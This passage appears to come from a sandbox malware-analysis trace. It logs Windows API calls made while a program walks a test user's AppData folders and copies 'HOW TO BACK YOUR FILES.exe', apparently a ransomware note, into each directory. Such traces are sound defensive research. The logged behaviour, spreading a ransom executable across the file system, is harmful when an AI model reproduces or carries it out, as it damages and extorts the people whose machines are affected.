lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4dc14480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dc14480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.089] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache" [0111.089] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache" [0111.089] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.089] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\transcoded files cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.090] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.090] GetLastError () returned 0x0 [0111.090] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.090] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf7f22040, ftCreationTime.dwHighDateTime=0x1d3373f, ftLastAccessTime.dwLowDateTime=0x4dc14480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dc14480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.091] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists" [0111.091] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists" [0111.091] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.091] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.091] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.092] GetLastError () returned 0x0 [0111.092] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.092] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4dc14480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dc14480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.092] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0111.093] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0111.093] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.093] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.093] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.094] GetLastError () returned 0x0 [0111.094] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.094] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4dc3a5e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dc3a5e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.094] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0111.094] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0111.094] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.094] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.095] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.095] GetLastError () returned 0x0 [0111.096] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.096] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6cbf0b60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cbf0b60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.096] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713" [0111.096] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713" [0111.096] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.096] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.097] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.097] GetLastError () returned 0x0 [0111.097] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.097] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ca96f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ccaf240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ccaf240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.098] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer" [0111.098] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer" [0111.098] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.098] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.099] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.099] GetLastError () returned 0x0 [0111.099] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.099] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ccd53a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ccd53a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.100] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery" [0111.100] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery" [0111.100] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.100] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.100] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.101] GetLastError () returned 0x0 [0111.101] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.101] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4ed4ae10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dc60740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dc60740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.101] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active" [0111.102] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active" [0111.102] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.102] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.102] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.103] GetLastError () returned 0x0 [0111.103] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.103] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6db5fbe0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6cd21660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cd21660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.103] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active" [0111.103] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active" [0111.103] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.103] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\active\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.104] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.104] GetLastError () returned 0x0 [0111.104] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.105] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4ed70f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dc60740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dc60740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.105] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore" [0111.105] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore" [0111.105] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.105] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.106] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.106] GetLastError () returned 0x0 [0111.106] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.106] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1d705b70, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x6cd21660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cd21660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.107] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC" [0111.107] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC") returned="C:\\Users\\5p5NrGJn0jS 